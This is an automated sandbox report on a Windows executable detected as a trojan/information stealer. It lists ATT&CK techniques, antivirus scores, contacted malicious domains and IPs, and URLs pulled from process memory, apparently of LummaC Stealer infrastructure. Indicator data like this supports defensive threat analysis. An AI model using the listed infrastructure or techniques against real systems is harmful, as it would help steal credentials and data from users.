Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 Process Injection	1 Virtualization/Sandbox Evasion	1 OS Credential Dumping	11 Security Software Discovery	Remote Services	1 Screen Capture	21 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 DLL Side-Loading	1 Process Injection	LSASS Memory	1 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	11 Deobfuscate/Decode Files or Information	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	31 Data from Local System	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	4 Obfuscated Files or Information	NTDS	2 File and Directory Discovery	Distributed Component Object Model	2 Clipboard Data	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	22 Software Packing	LSA Secrets	22 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Q7QR4k52HL.exe	60%	Virustotal		Browse
Q7QR4k52HL.exe	66%	ReversingLabs	Win32.Trojan.CrypterX
Q7QR4k52HL.exe	100%	Avira	HEUR/AGEN.1306978
Q7QR4k52HL.exe	100%	Joe Sandbox ML

Dropped Files

⊘No Antivirus matches

Unpacked PE Files

⊘No Antivirus matches

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://checkout.steampow	0%	Avira URL Cloud	safe
https://sputnik-1985.com/apiN	100%	Avira URL Cloud	malware
https://api.steamp	0%	Avira URL Cloud	safe
https://login.steampU	0%	Avira URL Cloud	safe
https://store.steam	0%	Avira URL Cloud	safe
https://help.st	0%	Avira URL Cloud	safe
https://api.s	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
steamcommunity.com	104.102.49.254	true	false	high
sputnik-1985.com	104.21.48.1	true	false	high
femalsabler.shop	unknown	unknown	true	unknown
robinsharez.shop	unknown	unknown	true	unknown
soundtappysk.shop	unknown	unknown	true	unknown
crowdwarek.shop	unknown	unknown	true	unknown
versersleep.shop	unknown	unknown	true	unknown
skidjazzyric.click	unknown	unknown	false	high
chipdonkeruz.shop	unknown	unknown	true	unknown
apporholis.shop	unknown	unknown	true	unknown
handscreamny.shop	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
robinsharez.shop	false	high
crowdwarek.shop	false	high
skidjazzyric.click	false	high
https://sputnik-1985.com/api	false	high
femalsabler.shop	false	high
https://steamcommunity.com/profiles/76561199724331900	false	high
soundtappysk.shop	false	high
apporholis.shop	false	high
chipdonkeruz.shop	false	high
versersleep.shop	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://login.steampU	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://crl.microsoft	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/?subsection=broadcasts	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://skidjazzyric.click/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004CC000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.steamp	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/subscriber_agreement/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptc	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
http://www.valvesoftware.com/legal.htm	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://s.ytimg.com;	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steam.tv/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://store.steampowered.com/privacy_agreement/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/points/shop/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	Q7QR4k52HL.exe, 00000000.00000003.1756803659.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745668738.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1757013963.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://lv.queniujq.cn	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/profiles/76561199724331900/inventory/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.youtube.com/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/privacy_agreement/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/	Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	Q7QR4k52HL.exe, 00000000.00000003.1745668738.0000000002E7E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/recaptcha/	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampowered.com/	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://api.s	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://help.st	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://store.steampowered.com/about/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/my/wishlist/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://checkout.steampow	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://help.steampowered.com/en/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/market/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/news/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
http://store.steampowered.com/subscriber_agreement/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	Q7QR4k52HL.exe, 00000000.00000003.1756803659.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E75000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745668738.0000000002E7C000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1757013963.0000000002E75000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/discussions/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/stats/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://medal.tv	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/steam_refunds/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://x1.c.lencr.org/0	Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	Q7QR4k52HL.exe, 00000000.00000003.1772702622.0000000002E56000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	Q7QR4k52HL.exe, 00000000.00000003.1745780518.0000000002E50000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://steamcommunity.com/workshop/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://login.steampowered.com/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steam	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org/products/firefoxgro.all	Q7QR4k52HL.exe, 00000000.00000003.1773562976.0000000002F4A000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://store.steampowered.com/legal/	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE	Q7QR4k52HL.exe, 00000000.00000003.1728992190.00000000004B9000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://sputnik-1985.com/apiN	Q7QR4k52HL.exe, 00000000.00000002.1929908575.0000000000502000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	Q7QR4k52HL.exe, 00000000.00000003.1745256798.0000000002E4F000.00000004.00000800.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1745336519.0000000002E38000.00000004.00000800.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://recaptcha.net	Q7QR4k52HL.exe, 00000000.00000003.1742800786.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.3.dr	false		high
https://store.steampowered.com/	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high
http://127.0.0.1:27060	Q7QR4k52HL.exe, 00000000.00000003.1728992190.0000000000500000.00000004.00000020.00020000.00000000.sdmp, Q7QR4k52HL.exe, 00000000.00000003.1729187340.0000000000509000.00000004.00000020.00020000.00000000.sdmp	false		high
https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg	Q7QR4k52HL.exe, 00000000.00000003.1728942199.000000000054E000.00000004.00000020.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.21.48.1	sputnik-1985.com	United States		13335	CLOUDFLARENETUS	false
104.102.49.254	steamcommunity.com	United States		16625	AKAMAI-ASUS	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1588988
Start date and time:	2025-01-11 08:04:57 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 5m 29s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	8
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Q7QR4k52HL.exe renamed because original name is a hash value
Original Sample Name:	1b513e6f8721e444a9364dd93630f015.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@2/5@11/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 95% Number of executed functions: 21 Number of non-executed functions: 229
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.189.173.20, 40.126.32.134, 4.245.163.56, 20.12.23.50, 13.107.246.45
Excluded domains from analysis (whitelisted): ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
02:05:50	API Interceptor	9x Sleep call for process: Q7QR4k52HL.exe modified
02:06:13	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.48.1	ydJaT4b5N8.exe	Get hash	malicious	FormBook	Browse	www.vilakodsiy.sbs/vq3j/
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	www.axis138ae.shop/j2vs/
	SH8ZyOWNi2.exe	Get hash	malicious	CMSBrute	Browse	twirpx.org/administrator/index.php
	SN500, SN150 Spec.exe	Get hash	malicious	FormBook	Browse	www.antipromil.site/7ykh/
104.102.49.254	r4xiHKy8aM.exe	Get hash	malicious	Socks5Systemz	Browse	/ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
104.102.49.254	http://gtm-cn-j4g3qqvf603.steamproxy1.com/	Get hash	malicious	Unknown	Browse	www.valvesoftware.com/legal.htm

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
sputnik-1985.com	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.21.80.1
	Setup.exe	Get hash	malicious	LummaC	Browse	104.21.32.1
	HouseholdsClicking.exe	Get hash	malicious	LummaC	Browse	104.21.64.1
	FeedStation.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	DodSussex.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.64.1
	DangerousMidlands.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.112.1
	fghj.exe	Get hash	malicious	LummaC	Browse	104.21.96.1
	CondosGold_nopump.exe	Get hash	malicious	LummaC Stealer	Browse	104.21.48.1
	filename.exe	Get hash	malicious	LummaC	Browse	104.21.48.1
steamcommunity.com	xNuh0DUJaG.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	Unknown	Browse	104.102.49.254
	Setup.exe	Get hash	malicious	LummaC	Browse	104.102.49.254
	4hQFnbWlj8.exe	Get hash	malicious	Vidar	Browse	104.102.49.254
